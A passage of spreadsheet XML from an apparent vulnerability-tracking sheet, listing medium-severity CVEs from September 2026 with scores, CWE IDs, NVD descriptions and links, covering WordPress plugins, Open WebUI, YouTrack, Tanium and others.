        </is>
      </c>
      <c r="B5670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81423</t>
        </is>
      </c>
      <c r="C5670" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5670" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5670" s="5" t="inlineStr"/>
      <c r="F5670" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5670" s="5" t="inlineStr"/>
      <c r="H5670" s="5" t="inlineStr"/>
      <c r="I5670" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5670" s="5" t="inlineStr"/>
      <c r="K5670" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5670" s="5" t="inlineStr">
        <is>
          <t>The Accept Stripe Payments WordPress plugin before 2.1.4 does not validate a user-supplied URL before using it in a redirect, allowing unauthenticated attackers to redirect visitors to an arbitrary external website, which can be leveraged for phishing.</t>
        </is>
      </c>
      <c r="M5670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81423</t>
        </is>
      </c>
    </row>
    <row r="5671">
      <c r="A5671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81644</t>
        </is>
      </c>
      <c r="C5671" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5671" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5671" s="5" t="inlineStr"/>
      <c r="F5671" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5671" s="5" t="inlineStr"/>
      <c r="H5671" s="5" t="inlineStr"/>
      <c r="I5671" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5671" s="5" t="inlineStr"/>
      <c r="K5671" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L5671" s="5" t="inlineStr">
        <is>
          <t>DoS vulnerability in the preview service module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M5671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81644</t>
        </is>
      </c>
    </row>
    <row r="5672">
      <c r="A5672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82185</t>
        </is>
      </c>
      <c r="C5672" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5672" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5672" s="5" t="inlineStr"/>
      <c r="F5672" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5672" s="5" t="inlineStr"/>
      <c r="H5672" s="5" t="inlineStr"/>
      <c r="I5672" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5672" s="5" t="inlineStr"/>
      <c r="K5672" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5672" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not have capability or nonce checks on some of its A/B testing actions, allowing any authenticated user, such as a subscriber, to overwrite the cookie banner configuration shown to every visitor and to irreversibly reset the stored A/B test results.</t>
        </is>
      </c>
      <c r="M5672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82185</t>
        </is>
      </c>
    </row>
    <row r="5673">
      <c r="A5673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82298</t>
        </is>
      </c>
      <c r="C5673" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5673" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5673" s="5" t="inlineStr"/>
      <c r="F5673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5673" s="5" t="inlineStr"/>
      <c r="H5673" s="5" t="inlineStr"/>
      <c r="I5673" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5673" s="5" t="inlineStr"/>
      <c r="K5673" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5673" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to denial of service via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t>
        </is>
      </c>
      <c r="M5673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82298</t>
        </is>
      </c>
    </row>
    <row r="5674">
      <c r="A5674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82309</t>
        </is>
      </c>
      <c r="C5674" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5674" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5674" s="5" t="inlineStr"/>
      <c r="F5674" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5674" s="5" t="inlineStr"/>
      <c r="H5674" s="5" t="inlineStr"/>
      <c r="I5674" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5674" s="5" t="inlineStr"/>
      <c r="K5674" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-770</t>
        </is>
      </c>
      <c r="L5674" s="5" t="inlineStr">
        <is>
          <t>Robots::Validate versions from 0.3.2 before 0.3.11 for Perl allow unbounded outbound DNS queries per validation via a forward-confirmation loop that does not bound the names it queries.
_check_dns issues one PTR query for the client address, keeps the returned names matching the rule's domain, and issues a forward query for each until one resolves back to that address. Nothing bounds that list, and a client controls the reverse zone for its own address, so it chooses how many names the PTR answer holds. Net::DNS refetches a truncated answer over TCP by default, so the 512-byte UDP payload does not cap it either.
Any client whose User-Agent matches a rule with a domain reaches _check_dns. Each forward name is distinct and client-chosen, so every query misses the local cache and is resolved against the authoritative servers for that domain. The queries are synchronous, so the caller is held until all of them answer or time out.</t>
        </is>
      </c>
      <c r="M5674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82309</t>
        </is>
      </c>
    </row>
    <row r="5675">
      <c r="A5675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83628</t>
        </is>
      </c>
      <c r="C5675" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5675" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5675" s="5" t="inlineStr"/>
      <c r="F5675" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5675" s="5" t="inlineStr"/>
      <c r="H5675" s="5" t="inlineStr"/>
      <c r="I5675" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5675" s="5" t="inlineStr"/>
      <c r="K5675" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5675" s="5" t="inlineStr">
        <is>
          <t>The Theme My Login plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 7.1.15 on Multisite installations. This is due to the `tml_ms_signup_handler()` function's `gimmeanotherblog` branch failing to enforce the network's `active_signup` registration policy, checking only `is_user_logged_in()` while sibling branches such as `validate-blog-signup` apply the full policy gate. This makes it possible for authenticated attackers, with Subscriber-level access and above, to directly POST `stage=gimmeanotherblog` to Theme My Login's signup route, bypassing the configured registration policy entirely — even when it is set to `none` or `user` — which causes `wpmu_create_blog()` to execute with the attacker's user ID, after which WordPress core assigns the Administrator role on the newly created subsite via `add_user_to_blog()`. The privilege gain is scoped to the newly created subsite only; the attacker's account retains Subscriber-level access on the main site and does not obtain Super Admin or network-level capabilities such as `manage_network` or `manage_sites`.</t>
        </is>
      </c>
      <c r="M5675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83628</t>
        </is>
      </c>
    </row>
    <row r="5676">
      <c r="A5676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85132</t>
        </is>
      </c>
      <c r="C5676" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5676" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5676" s="5" t="inlineStr"/>
      <c r="F5676" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5676" s="5" t="inlineStr"/>
      <c r="H5676" s="5" t="inlineStr"/>
      <c r="I5676" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5676" s="5" t="inlineStr"/>
      <c r="K5676" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5676" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not perform nonce or capability checks on one of its cookie scanner AJAX actions, allowing any authenticated user, such as a subscriber, to read back the automated scan schedule the administrator configured.</t>
        </is>
      </c>
      <c r="M5676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85132</t>
        </is>
      </c>
    </row>
    <row r="5677">
      <c r="A5677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85543</t>
        </is>
      </c>
      <c r="C5677" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5677" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5677" s="5" t="inlineStr"/>
      <c r="F5677" s="5" t="inlineStr"/>
      <c r="G5677" s="5" t="inlineStr"/>
      <c r="H5677" s="5" t="inlineStr"/>
      <c r="I5677" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5677" s="5" t="inlineStr"/>
      <c r="K5677" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L5677" s="5" t="inlineStr">
        <is>
          <t>Some Wi-Fi series camera products have insufficient permission validation on certain interfaces, allowing authenticated low-privileged users to obtain device Wi-Fi configuration information through these interfaces.</t>
        </is>
      </c>
      <c r="M5677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85543</t>
        </is>
      </c>
    </row>
    <row r="5678">
      <c r="A5678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86087</t>
        </is>
      </c>
      <c r="C5678" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5678" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5678" s="5" t="inlineStr"/>
      <c r="F5678" s="5" t="inlineStr"/>
      <c r="G5678" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H5678" s="5" t="inlineStr"/>
      <c r="I5678" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5678" s="5" t="inlineStr"/>
      <c r="K5678" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5678" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 could allow an authenticated user to send a specially crafted request to write arbitrary files on the system.</t>
        </is>
      </c>
      <c r="M5678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86087</t>
        </is>
      </c>
    </row>
    <row r="5679">
      <c r="A5679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8615</t>
        </is>
      </c>
      <c r="C5679" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5679" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5679" s="5" t="inlineStr"/>
      <c r="F5679" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5679" s="5" t="inlineStr"/>
      <c r="H5679" s="5" t="inlineStr"/>
      <c r="I5679" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5679" s="5" t="inlineStr"/>
      <c r="K5679" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5679" s="5" t="inlineStr">
        <is>
          <t>The Reviso Exporter for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check and missing nonce verification on the disconnect_callback() function in versions up to, and including, 1.2.3. The function is registered to the 'wp_ajax_wcefr-disconnect' AJAX action and unconditionally calls delete_option('wcefr-agt'), which removes the Reviso Agreement Grant Token used to authenticate API calls. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's stored Agreement Grant Token, breaking the connection between WooCommerce and the Reviso service.</t>
        </is>
      </c>
      <c r="M5679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8615</t>
        </is>
      </c>
    </row>
    <row r="5680">
      <c r="A5680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86481</t>
        </is>
      </c>
      <c r="C5680" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5680" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5680" s="5" t="inlineStr"/>
      <c r="F5680" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5680" s="5" t="inlineStr"/>
      <c r="H5680" s="5" t="inlineStr"/>
      <c r="I5680" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5680" s="5" t="inlineStr"/>
      <c r="K5680" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5680" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 signed URL reuse allowed disclosure of restricted project icons</t>
        </is>
      </c>
      <c r="M5680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86481</t>
        </is>
      </c>
    </row>
    <row r="5681">
      <c r="A5681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86496</t>
        </is>
      </c>
      <c r="C5681" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5681" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5681" s="5" t="inlineStr"/>
      <c r="F5681" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5681" s="5" t="inlineStr"/>
      <c r="H5681" s="5" t="inlineStr"/>
      <c r="I5681" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5681" s="5" t="inlineStr"/>
      <c r="K5681" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5681" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18769 missing access control on Helpdesk authorized reporters exposed reporter email addresses</t>
        </is>
      </c>
      <c r="M5681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86496</t>
        </is>
      </c>
    </row>
    <row r="5682">
      <c r="A5682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86499</t>
        </is>
      </c>
      <c r="C5682" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5682" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5682" s="5" t="inlineStr"/>
      <c r="F5682" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5682" s="5" t="inlineStr"/>
      <c r="H5682" s="5" t="inlineStr"/>
      <c r="I5682" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5682" s="5" t="inlineStr"/>
      <c r="K5682" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5682" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.1.14047 predefined search fields leaked all group names to any user, regardless of visibility permission</t>
        </is>
      </c>
      <c r="M5682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86499</t>
        </is>
      </c>
    </row>
    <row r="5683">
      <c r="A5683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86853</t>
        </is>
      </c>
      <c r="C5683" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5683" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5683" s="5" t="inlineStr"/>
      <c r="F5683" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5683" s="5" t="inlineStr"/>
      <c r="H5683" s="5" t="inlineStr"/>
      <c r="I5683" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5683" s="5" t="inlineStr"/>
      <c r="K5683" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5683" s="5" t="inlineStr">
        <is>
          <t>A malicious webpage could repeatedly trigger external URL schemes, causing system prompts or external application launches. This could make Firefox for iOS temporarily unusable until the page is closed. This vulnerability was fixed in Firefox for iOS 155.1.</t>
        </is>
      </c>
      <c r="M5683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86853</t>
        </is>
      </c>
    </row>
    <row r="5684">
      <c r="A5684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87012</t>
        </is>
      </c>
      <c r="C5684" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5684" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5684" s="5" t="inlineStr"/>
      <c r="F5684" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5684" s="5" t="inlineStr"/>
      <c r="H5684" s="5" t="inlineStr"/>
      <c r="I5684" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5684" s="5" t="inlineStr"/>
      <c r="K5684" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-754</t>
        </is>
      </c>
      <c r="L5684" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.1, backend/open_webui/models/calendar.py stored the calendar event meta.alert_minutes value without type validation and the shared upcoming-event scheduler compared that value numerically. An authenticated user with the calendar permission could store a non-numeric alert_minutes value that raised an exception and aborted the instance-wide alert pass, suppressing all users' reminders while the event remained in the lookahead window. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M5684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87012</t>
        </is>
      </c>
    </row>
    <row r="5685">
      <c r="A5685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87013</t>
        </is>
      </c>
      <c r="C5685" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5685" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5685" s="5" t="inlineStr"/>
      <c r="F5685" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5685" s="5" t="inlineStr"/>
      <c r="H5685" s="5" t="inlineStr"/>
      <c r="I5685" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5685" s="5" t="inlineStr"/>
      <c r="K5685" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L5685" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, POST /api/v1/folders/{id}/update/parent allowed a user to place a folder under itself or one of its descendants, while the folder tree walks used by DELETE /api/v1/folders/{id} and POST /api/v1/folders/{id}/read did not track visited folder identifiers. An authenticated user could persist a parent cycle and start a request that consumed CPU and memory indefinitely, with the condition remaining stored until repaired. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M5685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87013</t>
        </is>
      </c>
    </row>
    <row r="5686">
      <c r="A5686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87017</t>
        </is>
      </c>
      <c r="C5686" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5686" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5686" s="5" t="inlineStr"/>
      <c r="F5686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5686" s="5" t="inlineStr"/>
      <c r="H5686" s="5" t="inlineStr"/>
      <c r="I5686" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5686" s="5" t="inlineStr"/>
      <c r="K5686" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="L5686" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.7.0 until 0.11.1, the built-in knowledge search tool passed the caller's readable knowledge identifiers through a metadata filter, but the search methods in eleven shipped vector backends ignored that filter. An authenticated user on an affected backend could enumerate the identifiers, names, and descriptions of inaccessible knowledge bases from the shared collection, although the associated document text remained in separate collections. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M5686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87017</t>
        </is>
      </c>
    </row>
    <row r="5687">
      <c r="A5687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87019</t>
        </is>
      </c>
      <c r="C5687" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5687" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5687" s="5" t="inlineStr"/>
      <c r="F5687" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5687" s="5" t="inlineStr"/>
      <c r="H5687" s="5" t="inlineStr"/>
      <c r="I5687" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5687" s="5" t="inlineStr"/>
      <c r="K5687" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5687" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M5687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87019</t>
        </is>
      </c>
    </row>
    <row r="5688">
      <c r="A5688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87032</t>
        </is>
      </c>
      <c r="C5688" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5688" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5688" s="5" t="inlineStr"/>
      <c r="F5688" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5688" s="5" t="inlineStr"/>
      <c r="H5688" s="5" t="inlineStr"/>
      <c r="I5688" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5688" s="5" t="inlineStr"/>
      <c r="K5688" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5688" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an information disclosure vulnerability in Tanium Server.</t>
        </is>
      </c>
      <c r="M5688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87032</t>
        </is>
      </c>
    </row>
    <row r="5689">
      <c r="A5689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87035</t>
        </is>
      </c>
      <c r="C5689" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5689" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5689" s="5" t="inlineStr"/>
      <c r="F5689" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5689" s="5" t="inlineStr"/>
      <c r="H5689" s="5" t="inlineStr"/>
      <c r="I5689" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5689" s="5" t="inlineStr"/>
      <c r="K5689" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5689" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an information disclosure vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M5689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87035</t>
        </is>
      </c>
    </row>
    <row r="5690">
      <c r="A5690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87046</t>
        </is>
      </c>
      <c r="C5690" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5690" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5690" s="5" t="inlineStr"/>
      <c r="F5690" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5690" s="5" t="inlineStr"/>
      <c r="H5690" s="5" t="inlineStr"/>
      <c r="I5690" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5690" s="5" t="inlineStr"/>
      <c r="K5690" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5690" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M5690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87046</t>
        </is>
      </c>
    </row>
    <row r="5691">
      <c r="A5691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87449</t>
        </is>
      </c>
      <c r="C5691" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5691" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5691" s="5" t="inlineStr"/>
      <c r="F5691" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5691" s="5" t="inlineStr"/>
      <c r="H5691" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5691" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5691" s="5" t="inlineStr"/>
      <c r="K5691" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5691" s="5" t="inlineStr">
        <is>
          <t>Cross-site request forgery in DeviceBoundSessionCredentials in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87449</t>
        </is>
      </c>
    </row>
    <row r="5692">
      <c r="A5692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87461</t>
        </is>
      </c>
      <c r="C5692" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5692" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5692" s="5" t="inlineStr"/>
      <c r="F5692" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5692" s="5" t="inlineStr"/>
